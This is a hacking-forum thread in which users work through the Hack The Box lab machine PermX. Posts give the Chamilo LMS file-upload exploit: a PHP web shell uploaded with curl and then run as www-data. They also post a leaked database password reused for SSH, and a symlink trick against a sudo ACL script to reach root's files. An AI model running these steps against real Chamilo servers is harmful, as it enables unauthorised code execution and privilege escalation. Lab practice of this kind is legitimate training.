HTB - PermX
by trevor69000 - Saturday July 6, 2024 at 07:40 PM
#1
https://app.hackthebox.com/machines/613 
Lets go
Reply
#2
https://starlabs.sg/advisories/23/23-3368/
Dont work, brute force user ¿?
Reply
#3
http://lms.permx.htb/app/config/parameters.yml.dist

parameters:     database_driver: pdo_mysql     database_host: 127.0.0.1     database_port: ~     database_name: chamilo111     database_user: root     database_password: root     mailer_transport: smtp     mailer_host: 127.0.0.1     mailer_user: ~     mailer_password: ~     # A secret key that's used to generate certain security-related tokens     secret: ThisTokenIsNotSoSecretChangeIt     password_encryption: sha1     # Activation for multi-url access     multiple_access_urls: false     # Deny the elimination of users     deny_delete_users: false     installed: ~     password_encryption: sha1     sp_bower_bin: '/usr/bin/bower'     url_append: ''     sonata_media.cdn.host: /uploads/media     # If you installed Chamilo in http://localhost/chamilo_master     # you need to setup like this:     # url_append: '/chamilo_master/web/'     # sonata_media.cdn.host: /chamilo_master/web/uploads/media     sonata_page.varnish.command: 'if [ ! -r "/etc/varnish/secret" ]; then echo "VALID ERROR :/"; else varnishadm -S /etc/varnish/secret -T 127.0.0.1:6082 {{ COMMAND }} "{{ EXPRESSION }}"; fi;'     locales: [en, fr, es, de]
Reply
#4
(07-06-2024, 07:43 PM)trevor69000 Wrote: http://lms.permx.htb/app/config/parameters.yml.dist

parameters:     database_driver: pdo_mysql     database_host: 127.0.0.1     database_port: ~     database_name: chamilo111     database_user: root     database_password: root     mailer_transport: smtp     mailer_host: 127.0.0.1     mailer_user: ~     mailer_password: ~     # A secret key that's used to generate certain security-related tokens     secret: ThisTokenIsNotSoSecretChangeIt     password_encryption: sha1     # Activation for multi-url access     multiple_access_urls: false     # Deny the elimination of users     deny_delete_users: false     installed: ~     password_encryption: sha1     sp_bower_bin: '/usr/bin/bower'     url_append: ''     sonata_media.cdn.host: /uploads/media     # If you installed Chamilo in http://localhost/chamilo_master     # you need to setup like this:     # url_append: '/chamilo_master/web/'     # sonata_media.cdn.host: /chamilo_master/web/uploads/media     sonata_page.varnish.command: 'if [ ! -r "/etc/varnish/secret" ]; then echo "VALID ERROR :/"; else varnishadm -S /etc/varnish/secret -T 127.0.0.1:6082 {{ COMMAND }} "{{ EXPRESSION }}"; fi;'     locales: [en, fr, es, de]

what that means
Ban reason:
Asking for rep is not allowed (Permanent)
Reply
#5
(07-06-2024, 07:58 PM)fuckhackthebox Wrote: https://starlabs.sg/advisories/23/23-4220/

$ echo '<?php system("id"); ?>' > rce.php $ curl -F 'bigUploadFile=@rce.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported' The file has successfully been uploaded. $ curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/rce.php' uid=33(www-data) gid=33(www-data) groups=33(www-data)

bro how can u know that the parameter is action?
Ban reason:
Asking for rep is not allowed (Permanent)
Reply
#6
(07-06-2024, 08:12 PM)fuckhackthebox Wrote:
(07-06-2024, 08:10 PM)osamy7593 Wrote: bro how can u know that the parameter is action?

from the article i linked

its literally just a copy paste exploit i didnt change anything

$ cat /var/www/chamilo/app/config/configuration.php ... // Database connection settings. $_configuration['db_host'] = 'localhost'; $_configuration['db_port'] = '3306'; $_configuration['main_database'] = 'chamilo'; $_configuration['db_user'] = 'chamilo'; $_configuration['db_password'] = '03F6lY3uXAP2bkW8'; // Enable access to database management for platform admins. $_configuration['db_manager_enabled'] = false; ...

ssh in as mtz with that password to get user.txt

great man
Ban reason:
Asking for rep is not allowed (Permanent)
Reply
#7
The sudo command seems like the obvious next step.


I tried creating a symlink
ln -s /root/root.txt root.txt

and then
sudo /opt/acl.sh mtz rwx /home/mtz/root.txt

But i get "Operation not permitted".

The root.txt gets regularly cleared so might be the right direction.
Reply
#8
why?

if [ ! -f "$target" ]; then
/usr/bin/echo "Target must be a file."
exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
mtz@permx:~$ sudo /opt/acl.sh mtz r /home/root/root.txt
sudo /opt/acl.sh mtz r /home/root/root.txt
Access denied.
mtz@permx:~$
Ban reason:
Asking for rep is not allowed (Permanent)
Reply
#9
it tells the file is not writable
Ban reason:
Asking for rep is not allowed (Permanent)
Reply
#10
(07-06-2024, 08:51 PM)shadow_monarch Wrote: mtz@permx:~$ ln -s /root/root.txt root1.txt
mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/root1.txt
setfacl: /home/mtz/root1.txt: Operation not permitted


why ??

just do it within 8 seconds then it'll work
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 90,850 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 4,317 03-28-2026, 03:30 AM
Last Post: lulaladrow
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 9,480 03-27-2026, 07:22 PM
Last Post: stn
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 2,303 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 2,601 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: 1 Guest(s)